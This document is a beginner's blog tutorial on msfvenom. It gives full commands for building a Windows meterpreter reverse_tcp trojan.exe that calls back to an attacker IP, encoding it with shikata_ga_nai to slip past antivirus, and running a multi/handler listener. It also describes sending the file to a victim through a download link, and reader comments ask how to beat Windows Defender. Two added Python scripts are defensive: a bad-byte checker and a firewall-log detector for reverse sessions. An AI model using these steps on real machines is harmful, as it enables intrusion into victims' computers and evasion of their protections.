Hello and welcome to my blog; here is my latest post. As you know, msfpayload was used to create payloads (generally called trojans or backdoors) and msfencode was used to encode payloads to avoid antivirus detection. You can read about them in my old post Creating Trojan Horse (Encoded) By Using Msfpayload, but both msfpayload and msfencode were removed from the Metasploit Framework on June 8th, 2015.
So what replaces them now?
The answer is msfvenom.
In this article I will cover what msfvenom is, what it is used for, how to generate and encode a payload with msfvenom, how to avoid bad characters with msfvenom, and how to start a multi/handler listener to receive the connection from the trojan/backdoor.
What is msfvenom?
In simple words, “msfvenom is a combination of msfpayload and msfencode: it is used to generate payloads and to encode them as well.” You no longer need to run two different commands to create a payload and encode it. msfvenom ships with Metasploit by default, so you don’t need to install an extra package on your system. For more detail about Metasploit see https://www.metasploit.com/, and for tutorials read my Metasploit guide section.
The Metasploit command line interface msfconsole and the GUI Armitage are preinstalled in the current version of Kali Linux, Kali 2016.2. I will describe the tutorial using Kali Linux.
Let’s start using MSFvenom
In Kali Linux, right click on the desktop, then click Open Terminal. A new terminal window will open; type the following command
#msfvenom -h
How to generate a payload using MSFvenom
To generate a payload, two switches must be used: -p and -f. -p selects the payload and -f the output file format. You should first know which payload you are going to use. To print the list of available payloads use -l
#msfvenom -l payloads
After selecting an appropriate payload, use the following command
#msfvenom -p <payload> -f <file format>
To know more about the available formats use the following command
#msfvenom --help-formats
#msfvenom -p windows/meterpreter/reverse_tcp -f exe > PATH
The final command would be
#msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe
Before executing the final command you should know about the payload options to be used. You can see in the above command that the payload is meant to connect back to the attacker, but as written it will not connect back, because the options are not specified yet. So you must know the available options for windows/meterpreter/reverse_tcp. Run the following command
#msfvenom --payload-options -p <payload>
Now the command is
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[desired port] -f exe > /root/Desktop/trojan.exe
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=4444 -f exe > /root/Desktop/trojan.exe
The good news is that your payload is ready: you can send this payload to the victim machine, and when the victim executes this file he will be hacked. But this payload is well known and most antivirus products are aware of it; antivirus will easily detect this file and remove it. So what is next?
You can do the following things:
- Avoid bad characters
- Encode the payload
- Use iterations
How to avoid bad characters in the payload by using msfvenom
As you have seen in the help menu of msfvenom, the -b flag is used to keep certain bad characters out of the payload. When the -b switch is used, msfvenom finds a suitable encoder to encode the payload and avoids the bad characters automatically
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -b '\x00' -f exe > /root/Desktop/trojan.exe
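The -b flag is a promise about the bytes msfvenom emits, and that promise is easy to verify on the raw bytes instead of trusting it. The script below is an added example written for this post; it is not part of msfvenom or Metasploit. It reads a file of raw payload bytes (msfvenom's -f raw format writes exactly that) and reports the offset of every listed bad byte that is still present. The sample bytes in the block are constructed and are not a real payload; the file name and the \xNN spec syntax are assumptions taken from the command above.

```python
"""Report which bad characters survive in a raw payload blob.

Added example for this post (not part of msfvenom or Metasploit): the
-b flag tells msfvenom which bytes must not appear in its output; this
script checks a raw payload file for exactly that, so you can confirm
the encoder honoured the list before relying on the output.
"""
import sys


def parse_badchars(spec: str) -> bytes:
    """Turn an msfvenom-style spec such as '\\x00\\x0a' into bytes.

    Only the \\xNN notation used on the msfvenom command line is
    accepted. The '/x00' form seen in some copies of the command (a
    typo for '\\x00') is rejected, because msfvenom itself would not
    treat it as a null byte either.
    """
    parts = spec.split("\\x")
    if parts[0] != "":
        raise ValueError("bad-char spec must start with \\x, got %r" % spec)
    out = bytearray()
    for hexpair in parts[1:]:
        if len(hexpair) != 2:
            raise ValueError("expected two hex digits, got %r" % hexpair)
        out.append(int(hexpair, 16))
    return bytes(out)


def find_badchars(payload: bytes, bad: bytes) -> dict:
    """Map each bad byte value to the offsets where it occurs.

    An empty dict means the payload contains none of the bad bytes.
    """
    hits = {}
    for b in bad:
        offsets = [i for i, v in enumerate(payload) if v == b]
        if offsets:
            hits[b] = offsets
    return hits


def is_clean(payload: bytes, bad: bytes) -> bool:
    """True when no bad byte appears anywhere in payload."""
    return not find_badchars(payload, bad)


if __name__ == "__main__":
    # Constructed sample bytes (not a payload): a null at offset 3 and a
    # newline at offset 5, so both bad bytes are reported.
    sample = b"\x90\x90\x90\x00\xcc\x0a"
    print(find_badchars(sample, parse_badchars("\\x00\\x0a")))

    # Usage on a real file: python badchars.py payload.bin '\x00\x0a'
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
        spec = sys.argv[2] if len(sys.argv) > 2 else "\\x00"
        hits = find_badchars(data, parse_badchars(spec))
        print("clean" if not hits else "bad bytes found: %r" % hits)
```

Run it against the raw output of the same msfvenom command (swap -f exe for -f raw) and the dict should come back empty; if it does not, the chosen encoder could not satisfy the list and the exe built from the same options will carry those bytes too.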
How to encode a payload by msfvenom
When you use the -b flag, the payload is encoded automatically with a suitable encoder. But if you still want to use a specific encoder, you can pass -e [encoder name]. You can only use encoders that are available in msfvenom, so first run the following command to list the available encoders
#msfvenom -l encoders
Your final command will be
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -f exe > /root/Desktop/trojan.exe
Iterations:
The -i flag sets the number of times the payload is run through the encoder
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > /root/Desktop/trojan.exe
Set the architecture and platform for the payload with msfvenom
-a <x64/x86> is used to define the architecture, and --platform to define the platform, but first check the platforms available in Metasploit.
#msfvenom --help-platforms
#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > /root/Desktop/trojan.exe
Start multihandler server on attacker machine
The trojan will be executed on the victim’s machine and will send a connection back to the attacker’s machine, so the attacker must have a listener running there. You can start the multi/handler listener on your attacker machine by following these instructions
#msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.100   [attacker IP]
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
This is a very important phase. You have created trojan.exe and started the multi/handler listener; the next step is to send it to the victim machine. I started the apache2 web server and moved trojan.exe to /var/www/html, and I forwarded port 80 on my router to my attacker machine, and I sent the link http://AttackerIP/trojan.exe. The victim downloads the trojan and executes it, and the session will be created.
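Seen from the other side, the handler step above is what a defender looks for: the moment the victim runs the file, an internal workstation opens an outbound TCP session to LHOST:LPORT, holds it for as long as the Meterpreter session lives, and reconnects if it drops. The script below is an added detection example written for this post, not part of Metasploit or msfvenom. It runs two simple heuristics over firewall session logs: long-lived sessions from an internal host to an external host on a port that ordinary client traffic does not use, and repeated connections to the same external host and port. The log format, IP addresses and the EXPECTED_PORTS list are constructed for this example; adapt LINE_RE and the port list to your own firewall export and environment.

```python
"""Flag reverse-connection sessions in firewall logs.

Added detection example for this post; not part of Metasploit or
msfvenom. A reverse_tcp payload makes the victim open an outbound TCP
session to LHOST:LPORT, keep it alive, and reconnect when it drops.
In session logs that is an internal workstation holding a long session
to an external address on an uncommon port, usually more than once.
"""
import re
from collections import Counter

# Constructed sample lines, one finished TCP session each:
#   <timestamp> ALLOW TCP <src>:<sport> -> <dst>:<dport> dur=<seconds>
# 203.0.113.7 plays the external handler on port 4444 (the LPORT used
# in this post); 10.0.0.5 is an internal host and is deliberately not flagged.
SAMPLE_LOG = """\
2016-09-01T10:00:01 ALLOW TCP 10.0.0.23:51002 -> 93.184.216.34:443 dur=2
2016-09-01T10:00:05 ALLOW TCP 10.0.0.23:51010 -> 203.0.113.7:4444 dur=1843
2016-09-01T10:00:09 ALLOW TCP 10.0.0.42:51300 -> 93.184.216.34:80 dur=1
2016-09-01T10:01:12 ALLOW TCP 10.0.0.42:51322 -> 203.0.113.7:4444 dur=35
2016-09-01T10:31:40 ALLOW TCP 10.0.0.23:51400 -> 203.0.113.7:4444 dur=2201
2016-09-01T10:32:00 ALLOW TCP 10.0.0.23:51401 -> 10.0.0.5:4444 dur=900
"""

LINE_RE = re.compile(
    r"(?P<ts>\S+) ALLOW TCP (?P<src>\d+\.\d+\.\d+\.\d+):\d+ -> "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+) dur=(?P<dur>\d+)$"
)

# Destination ports a workstation is expected to reach on the internet;
# everything else counts as uncommon. Assumed for this example: tune it.
EXPECTED_PORTS = {53, 80, 443, 25, 587, 993}


def is_internal(ip):
    """Internal-address check for the two private ranges used here (assumption)."""
    return ip.startswith("10.") or ip.startswith("192.168.")


def parse_sessions(log_text):
    """Yield (src, dst, dport, duration_seconds) for every well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["src"], m["dst"], int(m["dport"]), int(m["dur"])


def _outbound_uncommon(src, dst, dport):
    """Internal -> external on a port not in EXPECTED_PORTS."""
    return is_internal(src) and not is_internal(dst) and dport not in EXPECTED_PORTS


def long_lived_uncommon(log_text, min_duration=300):
    """(src, dst, dport) triples for outbound uncommon-port sessions that
    lasted at least min_duration seconds: the shape of an established
    reverse shell. Returned sorted so results are stable."""
    hits = {
        (src, dst, dport)
        for src, dst, dport, dur in parse_sessions(log_text)
        if _outbound_uncommon(src, dst, dport) and dur >= min_duration
    }
    return sorted(hits)


def repeat_connectors(log_text, min_count=2):
    """(src, dst, dport) triples seen min_count or more times: a payload
    that reconnects after its session is cut produces exactly this."""
    counts = Counter(
        (src, dst, dport)
        for src, dst, dport, _ in parse_sessions(log_text)
        if _outbound_uncommon(src, dst, dport)
    )
    return sorted(t for t, n in counts.items() if n >= min_count)


if __name__ == "__main__":
    for hit in long_lived_uncommon(SAMPLE_LOG):
        print("long-lived uncommon session:", hit)
    for hit in repeat_connectors(SAMPLE_LOG):
        print("repeated connections:", hit)
```

On the constructed log only 10.0.0.23 talking to 203.0.113.7:4444 trips both rules: the 35-second session from 10.0.0.42 is too short and happens once, and the port-4444 session to 10.0.0.5 stays inside the network. Neither heuristic depends on the port being 4444 specifically, which matters because LPORT is whatever the operator chose; they key on session shape, which is harder to change than a port number.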
6 thoughts on “MSFvenom replacement of MSFpayload and msfencode Guide for Beginners”
I tried it but antivirus, even Windows Defender, is able to detect the virus. Is there any other way to evade the detection even though there is Quick Heal Total Security?
Hi Mitul,
Your question is good, but this is well-known code, so all antivirus products have its signature and detect it easily. Sometimes encoding works properly. If you really want to bypass AV, you should write your own code or use a paid encoder.
Thanks
I am getting this error:
handler failed to bind (public ip) :1337
I am using my dynamic DNS host as LHOST.
I didn’t get you on the dynamic DNS host.
Would you like to explain?